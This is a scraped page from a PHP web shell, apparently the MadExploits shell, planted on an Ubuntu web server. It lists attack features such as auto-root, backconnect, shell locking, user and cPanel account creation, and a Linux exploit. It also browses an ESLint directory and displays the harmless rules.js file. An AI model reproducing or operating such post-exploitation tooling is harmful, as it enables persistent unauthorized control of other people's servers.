Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
eslint /
lib /
linter /
[ HOME SHELL ]
Name
Size
Permission
Action
code-path-analysis
[ DIR ]
drwxr-xr-x
apply-disable-directives.js
18.66
KB
-rw-r--r--
esquery.js
9.1
KB
-rw-r--r--
file-context.js
3.53
KB
-rw-r--r--
file-report.js
18.25
KB
-rw-r--r--
index.js
179
B
-rw-r--r--
interpolate.js
1.31
KB
-rw-r--r--
linter.js
75.61
KB
-rw-r--r--
rule-fixer.js
5.04
KB
-rw-r--r--
rules.js
1.63
KB
-rw-r--r--
source-code-fixer.js
4.11
KB
-rw-r--r--
source-code-traverser.js
9.47
KB
-rw-r--r--
source-code-visitor.js
2.1
KB
-rw-r--r--
timing.js
3.73
KB
-rw-r--r--
vfile.js
2.75
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rules.js
/** * @fileoverview Defines a storage for rules. * @author Nicholas C. Zakas * @author aladdin-add */ "use strict"; //------------------------------------------------------------------------------ // Requirements //------------------------------------------------------------------------------ const builtInRules = require("../rules"); //------------------------------------------------------------------------------ // Typedefs //------------------------------------------------------------------------------ /** @typedef {import("../types").Rule.RuleModule} Rule */ //------------------------------------------------------------------------------ // Public Interface //------------------------------------------------------------------------------ /** * A storage for rules. */ class Rules { constructor() { this._rules = Object.create(null); } /** * Registers a rule module for rule id in storage. * @param {string} ruleId Rule id (file name). * @param {Rule} rule Rule object. * @returns {void} */ define(ruleId, rule) { this._rules[ruleId] = rule; } /** * Access rule handler by id (file name). * @param {string} ruleId Rule id (file name). * @returns {Rule} Rule object. */ get(ruleId) { if (typeof this._rules[ruleId] === "string") { this.define(ruleId, require(this._rules[ruleId])); } if (this._rules[ruleId]) { return this._rules[ruleId]; } if (builtInRules.has(ruleId)) { return builtInRules.get(ruleId); } return null; } *[Symbol.iterator]() { yield* builtInRules; for (const ruleId of Object.keys(this._rules)) { yield [ruleId, this.get(ruleId)]; } } } module.exports = Rules;
Close